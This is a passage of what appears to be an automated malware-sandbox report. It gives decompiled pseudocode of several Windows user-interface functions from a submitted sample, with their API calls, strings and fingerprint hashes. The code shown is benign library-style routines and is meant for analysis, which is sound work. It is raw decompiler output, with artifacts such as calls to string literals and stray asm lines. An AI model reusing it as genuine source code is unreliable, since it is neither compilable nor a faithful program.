									_push(0xe);
									goto L51;
								}
							} else {
								_push(0xb);
								goto L51;
							}
						} else {
							if((_v7 & 0x00000002) == 0) {
								if(_a8 <= _v44.top + _t219) {
									goto L33;
								} else {
									_t161 = ((0 | _a8 - _t238 - _t219 < 0x00000000) - 0x00000001 & 0x00000006) + 0xa;
								}
							} else {
								_push(0xa);
								goto L51;
							}
						}
					} else {
						if((_v7 & 0x00000002) == 0) {
							if(_a4.x > _v44.left + _t150) {
								_t161 = ((0 | _a4.x - _v44.right - _t150 < 0x00000000) - 0x00000001 & 0x00000002) + 0xf;
							} else {
								_push(0x10);
								goto L51;
							}
						} else {
							_push(0xf);
							goto L51;
						}
					}
				} else {
					if((_v7 & 0x00000002) == 0) {
						if(_a4.x > _v44.left + _t150) {
							_t161 = ((0 | _a4 - _v44.right - _t150 < 0x00000000) - 0x00000001 & 0x00000002) + 0xc;
						} else {
							L33:
							_push(0xd);
							goto L51;
						}
					} else {
						_push(0xc);
						L51:
						_pop(_t161);
					}
				}
				if((_v7 & 0x00000008) != 0) {
					goto L54;
				}
				return _t161;
			}

0x00422e0b
0x00422e0d
0x00422e15
0x00422e1f
0x00422e2f
0x00422e33
0x00422e3f
0x00422e42
0x00422e4a
0x00422e58
0x00422e5a
0x00422e5b
0x00422e7a
0x00422e7d
0x00422e87
0x00000000
0x00000000
0x00000000
0x00422e89
0x00422e89
0x00422e8d
0x00422ea3
0x00422ead
0x00422ec5
0x00000000
0x00422ec5
0x00422eb1
0x00422eb4
0x00422f00
0x00422f0c
0x00422f0f
0x00000000
0x00422f0f
0x00422eb6
0x00422eb9
0x00422efc
0x00422edb
0x00000000
0x00422edb
0x00422ebb
0x00422ebc
0x00422eeb
0x00000000
0x00422eeb
0x00422ebe
0x00422ec0
0x00422ed8
0x00000000
0x00422ed8
0x00422ec3
0x00000000
0x00000000
0x00000000
0x00422ec3
0x00000000
0x00422e8f
0x00422e63
0x00422e66
0x00422e68
0x00422e68
0x00422e74
0x00422f2d
0x00000000
0x00000000
0x00000000
0x00000000
0x00422e74
0x00422e5b
0x00422f17
0x00422f2b
0x00000000
0x00000000
0x00422f38
0x00422f3c
0x00422f41
0x00422f46
0x00422f4c
0x00422f55
0x00422f5b
0x00422f61
0x00422f64
0x00422f71
0x00422f77
0x00422f85
0x00422f87
0x004230f9
0x004230f9
0x00000000
0x004230f9
0x00422f95
0x004230bf
0x004230bf
0x004230c4
0x004230d3
0x004230da
0x004230f7
0x00000000
0x004230f7
0x004230dc
0x004230eb
0x004230a5
0x004230a5
0x004230f3
0x004230f3
0x004230f3
0x00000000
0x004230eb
0x00422f9e
0x00422fa3
0x00422fad
0x00422fb9
0x00422fc4
0x00422ffd
0x00423007
0x0042303a
0x00423042
0x00423073
0x004230b6
0x004230bc
0x00000000
0x004230bc
0x00423079
0x00423087
0x0042309c
0x00423089
0x00423089
0x00000000
0x00423089
0x0042307b
0x0042307b
0x00000000
0x0042307b
0x00423044
0x00423048
0x00423056
0x00000000
0x00423058
0x00423066
0x00423066
0x0042304a
0x0042304a
0x00000000
0x0042304a
0x00423048
0x00423009
0x0042300d
0x0042301b
0x00423032
0x0042301d
0x0042301d
0x00000000
0x0042301d
0x0042300f
0x0042300f
0x00000000
0x0042300f
0x0042300d
0x00422fc6
0x00422fca
0x00422fdb
0x00422ff5
0x00422fdd
0x00422fdd
0x00422fdd
0x00000000
0x00422fdd
0x00422fcc
0x00422fcc
0x0042308b
0x0042308b
0x0042308b
0x00422fca
0x004230a3
0x00000000
0x00000000
0x004230fe

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

GetWindowRect.USER32 ref: 00422E1F
GetSystemMetrics.USER32 ref: 00422E2D
GetSystemMetrics.USER32 ref: 00422E36
GetKeyState.USER32(00000002), ref: 00422E6B
InflateRect.USER32(?,?,00000000), ref: 00422EA3
PtInRect.USER32(?,?,?), ref: 00422F27

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Rect$MetricsSystemWindow$InflateLongState
String ID:
API String ID: 90034188-0
Opcode ID: 4815d690c65c5df91f50d3a0b43a45b49be0c46c8ec28819b598da24b08e638b
Instruction ID: 3d4fded11727fa72cddd390d452a0739f578755c9cf4983628836b576b503de4
Opcode Fuzzy Hash: 4815d690c65c5df91f50d3a0b43a45b49be0c46c8ec28819b598da24b08e638b
Instruction Fuzzy Hash: F4A1D931B00229ABDF14CFA8D945BEE77B1EF08355F55802BE902E7244D7BC9A81DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00411E32, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 175
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00411E32(intOrPtr* __ecx) {
				intOrPtr _t81;
				intOrPtr _t90;
				struct HWND__* _t91;
				intOrPtr* _t142;
				intOrPtr* _t145;
				void* _t147;
				void* _t149;

				_t118 = __ecx;
				E00406520(E00429CDC, _t147);
				_t145 = __ecx;
				 *((intOrPtr*)(_t147 - 0x10)) = _t149 - 0x34;
				 *((intOrPtr*)(_t147 - 0x24)) = __ecx;
				if( *(_t147 + 0x10) == 0) {
					 *(_t147 + 0x10) =  *(E00424BFB() + 8);
				}
				_t142 =  *((intOrPtr*)(E00424BFB() + 0x1038));
				 *((intOrPtr*)(_t147 - 0x28)) = _t142;
				 *(_t147 - 0x14) = 0;
				 *(_t147 - 0x18) = 0;
				 *(_t147 - 4) = 0;
				E0041615D(_t118, 0x10);
				E0041615D(_t118, 0x3c000);
				if(_t142 == 0) {
					L5:
					if( *(_t147 + 8) == 0) {
						L31:
						L33:
						 *[fs:0x0] =  *((intOrPtr*)(_t147 - 0xc));
						return 0;
					}
					_t81 =  *0x436980; // 0x436994
					 *((intOrPtr*)(_t147 - 0x1c)) = _t81;
					 *(_t147 - 4) = 1;
					 *((intOrPtr*)(_t147 - 0x20)) = 0;
					if((0 | E00416F5E( *(_t147 + 8), _t147 - 0x1c, _t147 - 0x20) == 0x00000000) != 0) {
						L13:
						E00416DAD(_t147 - 0x40,  *(_t147 + 8));
						 *(_t147 - 4) = 2;
						E004170E7(_t147 - 0x40,  *((intOrPtr*)(_t147 - 0x20)));
						 *(_t147 - 0x14) = E00416E4A(_t147 - 0x40);
						 *(_t147 - 4) = 1;
						E00416E3C(_t147 - 0x40);
						if( *(_t147 - 0x14) != 0) {
							 *(_t147 + 8) = GlobalLock( *(_t147 - 0x14));
						}
						L15:
						 *(_t145 + 0x2c) =  *(_t145 + 0x2c) | 0xffffffff;
						 *(_t145 + 0x24) =  *(_t145 + 0x24) | 0x00000010;
						_push(_t145);
						"VWh\rDB"();
						_t90 =  *((intOrPtr*)(_t147 + 0xc));
						if(_t90 != 0) {
							_t91 =  *(_t90 + 0x1c);
						} else {
							_t91 = 0;
						}
						 *(_t147 - 0x18) = CreateDialogIndirectParamA( *(_t147 + 0x10),  *(_t147 + 8), _t91, E00411B77, 0);
						 *(_t147 - 4) = 0;
						E00416AEC(_t147 - 0x1c);
						 *(_t147 - 4) =  *(_t147 - 4) | 0xffffffff;
						if(_t142 != 0) {
							 *((intOrPtr*)( *_t142 + 0x14))(_t147 - 0x34);
							if( *(_t147 - 0x18) != 0) {
								 *((intOrPtr*)( *_t145 + 0xb4))(0);
							}
						}
						if(E00413C3E() == 0) {
							 *((intOrPtr*)( *_t145 + 0xa4))();
						}
						if( *(_t147 - 0x18) != 0 && ( *(_t145 + 0x24) & 0x00000010) == 0) {
							DestroyWindow( *(_t147 - 0x18));
							 *(_t147 - 0x18) = 0;
						}
						if( *(_t147 - 0x14) != 0) {
							GlobalUnlock( *(_t147 - 0x14));
							GlobalFree( *(_t147 - 0x14));
						}
						if( *(_t147 - 0x18) != 0 || ( *(_t145 + 0x24) & 0x00000010) == 0) {
							_push(1);
							_pop(0);
							goto L33;
						} else {
							goto L31;
						}
					}
					if(GetSystemMetrics(0x2a) == 0 || E0040653F( *((intOrPtr*)(_t147 - 0x1c)), "MS Shell Dlg") != 0 && E0040653F( *((intOrPtr*)(_t147 - 0x1c)), "MS Sans Serif") != 0 && E0040653F( *((intOrPtr*)(_t147 - 0x1c)), ?str?) != 0) {
						goto L15;
					} else {
						if( *((short*)(_t147 - 0x20)) == 8) {
							 *((intOrPtr*)(_t147 - 0x20)) = 0;
						}
						goto L13;
					}
				}
				_push(_t147 - 0x34);
				if( *((intOrPtr*)( *_t145 + 0xb4))() == 0) {
					goto L31;
				}
				 *(_t147 + 8) =  *((intOrPtr*)( *_t142 + 0x10))(_t147 - 0x34,  *(_t147 + 8));
				goto L5;
			}

0x00411e32
0x00411e37
0x00411e47
0x00411e49
0x00411e4c
0x00411e4f
0x00411e59
0x00411e59
0x00411e61
0x00411e69
0x00411e6c
0x00411e6f
0x00411e72
0x00411e75
0x00411e7f
0x00411e86
0x00411eaf
0x00411eb2
0x00412047
0x0041204e
0x00412053
0x0041205c
0x0041205c
0x00411eb8
0x00411ebd
0x00411ec3
0x00411ecc
0x00411ee5
0x00411f3a
0x00411f40
0x00411f4b
0x00411f4f
0x00411f5f
0x00411f62
0x00411f66
0x00411f6e
0x00411f79
0x00411f79
0x00411f7c
0x00411f7c
0x00411f80
0x00411f84
0x00411f85
0x00411f8a
0x00411f8f
0x00411f95
0x00411f91
0x00411f91
0x00411f91
0x00411fae
0x00411fb1
0x00411fb4
0x00411fd8
0x00411fde
0x00411fe8
0x00411fee
0x00411ff5
0x00411ff5
0x00411fee
0x00412002
0x00412008
0x00412008
0x00412011
0x0041201c
0x00412022
0x00412022
0x00412028
0x0041202d
0x00412036
0x00412036
0x0041203f
0x0041204b
0x0041204d
0x00000000
0x00000000
0x00000000
0x00000000
0x0041203f
0x00411ef1
0x00000000
0x00411f30
0x00411f35
0x00411f37
0x00411f37
0x00000000
0x00411f35
0x00411ef1
0x00411e8d
0x00411e98
0x00000000
0x00000000
0x00411eac
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00411E37
GetSystemMetrics.USER32 ref: 00411EE9
GlobalLock.KERNEL32 ref: 00411F73
CreateDialogIndirectParamA.USER32(?,?,?,00411B77,00000000), ref: 00411FA5

Part of subcall function 00416AEC: InterlockedDecrement.KERNEL32(-000000F4), ref: 00416B00

DestroyWindow.USER32(00000000,?,?,?,00000000,?,?), ref: 0041201C
GlobalUnlock.KERNEL32(?,?,?,?,00000000,?,?), ref: 0041202D
GlobalFree.KERNEL32 ref: 00412036

Strings

Helv, xrefs: 00411F1D
MS Shell Dlg, xrefs: 00411EF7
MS Sans Serif, xrefs: 00411F0A

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Global$CreateDecrementDestroyDialogFreeH_prologIndirectInterlockedLockMetricsParamSystemUnlockWindow
String ID: Helv$MS Sans Serif$MS Shell Dlg
API String ID: 2343056566-2894235370
Opcode ID: b92bef3789bdaf7cf45641bf13bee934e354941852864a1178ecb765b367d6cf
Instruction ID: aadedd96d0c9695131ff4cccacd717b3f0d87f33b0c70c2cb72ca24c31ea773e
Opcode Fuzzy Hash: b92bef3789bdaf7cf45641bf13bee934e354941852864a1178ecb765b367d6cf
Instruction Fuzzy Hash: 5A617131A0025ADFCF14EFA5D985AEEBBB1FF08304F10452FF505A62A1D7789A81CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041D196, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 209
windowCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0041D196(intOrPtr __ecx, void* __edx, intOrPtr _a4, RECT* _a8) {
				struct tagRECT _v20;
				signed int _v24;
				intOrPtr _v28;
				struct tagRECT _v44;
				char _v304;
				void* __ebp;
				int _t69;
				signed char _t72;
				signed char _t77;
				signed int _t82;
				signed int _t84;
				void* _t90;
				struct HWND__* _t94;
				intOrPtr _t122;
				intOrPtr _t130;
				void* _t142;
				signed char _t143;
				signed char _t145;
				intOrPtr _t147;
				void* _t149;

				_t142 = __edx;
				_t147 = _a4;
				_t122 = __ecx;
				_t69 = GetWindowRect( *(_t147 + 0x1c),  &_v44);
				if( *((intOrPtr*)(_t147 + 0x70)) != _t122) {
					_t143 = 0;
					__eflags = 0;
					L5:
					if( *((intOrPtr*)(_t122 + 0x78)) != _t143 && ( *(_t147 + 0x68) & 0x00000040) != 0) {
						 *(_t122 + 0x64) =  *(_t122 + 0x64) | 0x00000040;
					}
					 *(_t122 + 0x64) =  *(_t122 + 0x64) & 0xfffffff9;
					_t72 =  *(_t147 + 0x64) & 0x00000006 |  *(_t122 + 0x64);
					 *(_t122 + 0x64) = _t72;
					if((_t72 & 0x00000040) == 0) {
						E004165E5(_t147,  &_v304, 0x104);
						E0041A843( *(_t122 + 0x1c),  &_v304);
					}
					_t77 = ( *(_t122 + 0x64) ^  *(_t147 + 0x64)) & 0x0000f000 ^  *(_t147 + 0x64) | 0x0000000f;
					if( *((intOrPtr*)(_t122 + 0x78)) == _t143) {
						_t78 = _t77 & 0x000000fe;
						__eflags = _t77 & 0x000000fe;
					} else {
						_t78 = _t77 | 0x00000001;
					}
					E004263C3(_t147, _t78);
					_v28 = _t143;
					if( *((intOrPtr*)(_t147 + 0x70)) != _t122 && IsWindowVisible( *(_t147 + 0x1c)) != 0) {
						E0041663D(_t147, _t143, _t143, _t143, _t143, _t143, 0x97);
						_v28 = 1;
					}
					_v24 = _v24 | 0xffffffff;
					if(_a8 == _t143) {
						_t144 = _t122 + 0x7c;
						E0041158A(_t122 + 0x7c,  *((intOrPtr*)(_t122 + 0x84)), _t147);
						E0041158A(_t122 + 0x7c,  *((intOrPtr*)(_t144 + 8)), 0);
						_t82 =  *0x439bf4; // 0x2
						_t145 = 0;
						__eflags = 0;
						_t84 =  *0x439bf0; // 0x2
						E0041663D(_t147, 0,  ~_t84,  ~_t82, 0, 0, 0x115);
					} else {
						CopyRect( &_v20, _a8);
						E0041A2F1(_t122,  &_v20);
						asm("cdq");
						_t40 =  &(_v20.bottom); // 0x50402834
						asm("cdq");
						_push(( *_t40 - _v20.top - _t142 >> 1) + _v20.top);
						_push((_v20.right - _v20.left - _t142 >> 1) + _v20.left);
						asm("movsd");
						asm("movsd");
						_push(_a4);
						asm("movsd");
						asm("movsd");
						_v24 = E0041DD44(_t122);
						_t46 =  &(_v20.bottom); // 0x50402834
						E0041663D(_a4, 0, _v20.left, _v20.top, _v20.right - _v20.left,  *_t46 - _v20.top, 0x114);
						_t147 = _a4;
						_t145 = 0;
					}
					if(E00413740(_t149, GetParent( *(_t147 + 0x1c))) != _t122) {
						if(_t122 != _t145) {
							_t94 =  *(_t122 + 0x1c);
						} else {
							_t94 = 0;
						}
						E00413740(_t149, SetParent( *(_t147 + 0x1c), _t94));
					}
					_t130 =  *((intOrPtr*)(_t147 + 0x70));
					_t165 = _t130 - _t122;
					if(_t130 != _t122) {
						__eflags = _t130 - _t145;
						if(_t130 == _t145) {
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t122 + 0x78)) - _t145;
						if( *((intOrPtr*)(_t122 + 0x78)) == _t145) {
							L30:
							__eflags = 0;
							L31:
							_push(0);
							_push(0xffffffff);
							goto L32;
						}
						__eflags =  *((intOrPtr*)(_t130 + 0x78)) - _t145;
						if(__eflags != 0) {
							goto L30;
						}
						_push(1);
						_pop(0);
						goto L31;
					} else {
						_push(_t145);
						_push(_v24);
						L32:
						_push(_t147);
						E0041D609(_t130, _t165);
						L33:
						_t166 = _v28 - _t145;
						 *((intOrPtr*)(_t147 + 0x70)) = _t122;
						if(_v28 != _t145) {
							E0041663D(_t147, _t145, _t145, _t145, _t145, _t145, 0x57);
						}
						E0041D5A8(_t122, _t147);
						_t90 = E004225AA(_t122, _t166);
						 *(_t90 + 0xb8) =  *(_t90 + 0xb8) | 0x0000000c;
						return _t90;
					}
				}
				_t143 = 0;
				if(_a8 != 0) {
					_t69 = EqualRect( &_v44, _a8);
					if(_t69 == 0) {
						goto L5;
					}
				}
				return _t69;
			}

0x0041d196
0x0041d1a1
0x0041d1ac
0x0041d1ae
0x0041d1b7
0x0041d1db
0x0041d1db
0x0041d1dd
0x0041d1e0
0x0041d1e8
0x0041d1e8
0x0041d1ec
0x0041d1f9
0x0041d1fd
0x0041d200
0x0041d210
0x0041d21f
0x0041d21f
0x0041d233
0x0041d239
0x0041d23f
0x0041d23f
0x0041d23b
0x0041d23b
0x0041d23b
0x0041d244
0x0041d24c
0x0041d24f
0x0041d26a
0x0041d26f
0x0041d26f
0x0041d276
0x0041d27d
0x0041d2fa
0x0041d303
0x0041d30f
0x0041d314
0x0041d319
0x0041d319
0x0041d325
0x0041d330
0x0041d27f
0x0041d286
0x0041d292
0x0041d2a0
0x0041d2a5
0x0041d2b0
0x0041d2b8
0x0041d2b9
0x0041d2c1
0x0041d2c2
0x0041d2c3
0x0041d2c6
0x0041d2c7
0x0041d2cd
0x0041d2d0
0x0041d2ee
0x0041d2f3
0x0041d2f6
0x0041d2f6
0x0041d346
0x0041d34a
0x0041d350
0x0041d34c
0x0041d34c
0x0041d34c
0x0041d35e
0x0041d35e
0x0041d363
0x0041d366
0x0041d368
0x0041d370
0x0041d372
0x00000000
0x00000000
0x0041d374
0x0041d377
0x0041d383
0x0041d383
0x0041d385
0x0041d385
0x0041d386
0x00000000
0x0041d386
0x0041d379
0x0041d37c
0x00000000
0x00000000
0x0041d37e
0x0041d380
0x00000000
0x0041d36a
0x0041d36a
0x0041d36b
0x0041d388
0x0041d388
0x0041d389
0x0041d38e
0x0041d38e
0x0041d391
0x0041d394
0x0041d39f
0x0041d39f
0x0041d3a7
0x0041d3ae
0x0041d3b3
0x00000000
0x0041d3b3
0x0041d368
0x0041d1b9
0x0041d1be
0x0041d1cb
0x0041d1d3
0x00000000
0x0041d1d9
0x0041d1d3
0x0041d3be

APIs

GetWindowRect.USER32 ref: 0041D1AE
EqualRect.USER32 ref: 0041D1CB

Part of subcall function 0041663D: SetWindowPos.USER32(?,?,?,?,?,?,00000000,?,00412218,00000000,00000000,00000000,00000000,00000000,00000097,00000000), ref: 00416664

IsWindowVisible.USER32(?), ref: 0041D254
CopyRect.USER32 ref: 0041D286
GetParent.USER32(?), ref: 0041D338
SetParent.USER32(?,0000E800,00000000), ref: 0041D357

Strings

@, xrefs: 0041D1E8
@m7@, xrefs: 0041D1F3, 0041D227
4(@P, xrefs: 0041D2A5, 0041D2D0

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: RectWindow$Parent$CopyEqualVisible
String ID: 4(@P$@$@m7@
API String ID: 3103310903-421610842
Opcode ID: cac131d4966f25c1f2986bdc59dfc1c95fe9cab75364f357d42edf9083789053
Instruction ID: 71934383aa5695cd313cdbbfccdfa0b0166ee7a8a5881c634a4d6990b46abeb0
Opcode Fuzzy Hash: cac131d4966f25c1f2986bdc59dfc1c95fe9cab75364f357d42edf9083789053
Instruction Fuzzy Hash: 5461A5B1A00609EFDF21DF65CC85AEF7BB9EF44304F10452AF92696291C738D982CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00413821, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00413821(void* __ecx, void* __edx) {
				_Unknown_base(*)()* _t33;
				void* _t35;
				void* _t36;
				void* _t41;
				void* _t44;
				long _t54;
				signed int _t58;
				void* _t61;
				void* _t66;
				struct HWND__* _t68;
				CHAR* _t71;
				void* _t74;
				void* _t75;
				void* _t77;

				_t66 = __edx;
				_t61 = __ecx;
				E00406520(E00429E08, _t75);
				_t68 =  *(_t75 + 8);
				_t71 = "AfxOldWndProc423";
				 *((intOrPtr*)(_t75 - 0x10)) = _t77 - 0x40;
				_t33 = GetPropA(_t68, _t71);
				 *(_t75 - 0x14) =  *(_t75 - 0x14) & 0x00000000;
				 *(_t75 - 4) =  *(_t75 - 4) & 0x00000000;
				 *(_t75 - 0x18) = _t33;
				_t35 =  *(_t75 + 0xc) - 6;
				_t58 = 1;
				if(_t35 == 0) {
					_t36 = E00413740(_t75,  *(_t75 + 0x14));
					E004134A8(_t61, E00413740(_t75, _t68),  *(_t75 + 0x10), _t36);
					goto L9;
				} else {
					_t41 = _t35 - 0x1a;
					if(_t41 == 0) {
						_t58 = 0 | E00413509(E00413740(_t75, _t68),  *(_t75 + 0x14),  *(_t75 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t44 = _t41 - 0x62;
						if(_t44 == 0) {
							SetWindowLongA(_t68, 0xfffffffc,  *(_t75 - 0x18));
							RemovePropA(_t68, _t71);
							GlobalDeleteAtom(GlobalFindAtomA(_t71));
							goto L10;
						} else {
							if(_t44 != 0x8e) {
								L10:
								 *(_t75 - 0x14) = CallWindowProcA( *(_t75 - 0x18), _t68,  *(_t75 + 0xc),  *(_t75 + 0x10),  *(_t75 + 0x14));
							} else {
								_t74 = E00413740(_t75, _t68);
								E0041340C(_t74, _t75 - 0x30, _t75 - 0x1c);
								_t54 = CallWindowProcA( *(_t75 - 0x18), _t68, 0x110,  *(_t75 + 0x10),  *(_t75 + 0x14));
								_push( *((intOrPtr*)(_t75 - 0x1c)));
								 *(_t75 - 0x14) = _t54;
								_push(_t75 - 0x30);
								_push(_t74);
								E0041342F(_t66);
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t75 - 0xc));
				return  *(_t75 - 0x14);
			}

0x00413821
0x00413821
0x00413826
0x00413831
0x00413834
0x00413839
0x0041383e
0x00413844
0x00413848
0x0041384c
0x00413854
0x00413857
0x00413858
0x0041390e
0x00413920
0x00000000
0x0041385e
0x0041385e
0x00413861
0x00413906
0x00413925
0x00413927
0x00000000
0x00000000
0x00413867
0x00413867
0x0041386a
0x004138cc
0x004138d4
0x004138e2
0x00000000
0x0041386c
0x00413871
0x00413929
0x0041393c
0x00413877
0x0041387d
0x00413888
0x0041389c
0x004138a2
0x004138a5
0x004138ab
0x004138ac
0x004138ad
0x004138ad
0x00413871
0x0041386a
0x00413861
0x004138ba
0x004138c3

APIs

__EH_prolog.LIBCMT ref: 00413826
GetPropA.USER32 ref: 0041383E
CallWindowProcA.USER32 ref: 0041389C

Part of subcall function 0041342F: GetWindowRect.USER32 ref: 00413454
Part of subcall function 0041342F: GetWindow.USER32(?,00000004), ref: 00413471

SetWindowLongA.USER32 ref: 004138CC
RemovePropA.USER32 ref: 004138D4
GlobalFindAtomA.KERNEL32 ref: 004138DB
GlobalDeleteAtom.KERNEL32 ref: 004138E2

Part of subcall function 0041340C: GetWindowRect.USER32 ref: 00413418

CallWindowProcA.USER32 ref: 00413936

Strings

AfxOldWndProc423, xrefs: 00413834, 0041383C, 004138D2, 004138DA

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
String ID: AfxOldWndProc423
API String ID: 2397448395-1060338832
Opcode ID: ffe45afd7699b5a41d516579d2a7d3dc4d15bd4e98b8a7e359cf5195de427134
Instruction ID: 4899527f46ba9a8eebcd092d04d92ea77ba6043ae45329b01eeefbc2baec0ec1
Opcode Fuzzy Hash: ffe45afd7699b5a41d516579d2a7d3dc4d15bd4e98b8a7e359cf5195de427134
Instruction Fuzzy Hash: F3316F7290011ABBCB12AFA5DD49EFF7FB8EF09712F00402AF501A2151C7799A519BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004251B9, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004251B9() {
				int _t1;
				int _t7;
				struct HDC__* _t12;
				void* _t18;

				_t1 =  *0x436880; // 0xffffffff
				if(_t1 == 0xffffffff) {
					_t12 = GetDC(0);
					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
					if(_t18 != 0) {
						_t18 = SelectObject(_t12, _t18);
					}
					GetCharWidthA(_t12, 0x36, 0x36, 0x436880);
					if(_t18 != 0) {
						SelectObject(_t12, _t18);
						DeleteObject(_t18);
					}
					ReleaseDC(0, _t12);
					_t7 =  *0x436880; // 0xffffffff
					return _t7;
				}
				return _t1;
			}

0x004251b9
0x004251c1
0x004251e8
0x004251fd
0x00425201
0x00425207
0x00425207
0x00425213
0x0042521b
0x0042521f
0x00425222
0x00425222
0x0042522a
0x00425230
0x00000000
0x00425238
0x00425239

APIs

GetDC.USER32(00000000), ref: 004251CA
GetSystemMetrics.USER32 ref: 004251EA
CreateFontA.GDI32(00000000,?,?,00425352,00001000,?,?), ref: 004251F1
SelectObject.GDI32(00000000,00000000), ref: 00425205
GetCharWidthA.GDI32(00000000,00000036,00000036,00436880), ref: 00425213
SelectObject.GDI32(00000000,00000000), ref: 0042521F
DeleteObject.GDI32(00000000), ref: 00425222
ReleaseDC.USER32 ref: 0042522A

Strings

Marlett, xrefs: 004251D0

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
String ID: Marlett
API String ID: 1397664628-3688754224
Opcode ID: 7241a4e70ab03fdb0c4814db81f8993fad58ad3ff119ab58904e5ceeffb10693
Instruction ID: 574e7069028db96244f8dd859ef817299f0475ae2c7f4c91e639d061ecb05676
Opcode Fuzzy Hash: 7241a4e70ab03fdb0c4814db81f8993fad58ad3ff119ab58904e5ceeffb10693
Instruction Fuzzy Hash: A901A2317413507BC2312B266C8DE6B3F7CD7CBFA1B914225F515A2190CB654C01C6BC

Uniqueness

Uniqueness Score: -1.00%

Function 004037D0, Relevance: 15.4, APIs: 10, Instructions: 418
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004037D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, signed int _a44) {
				void* _t21;

				if(_a44 < 0 || _a44 >= 0x14) {
					_a44 = 0;
				}
				_t21 =  *((intOrPtr*)(0x4362b0 + _a44 * 4))(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40);
				return _t21;
			}

0x004037d7
0x004037df
0x004037df
0x00403811
0x0040381c

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID:
String ID:
API String ID:
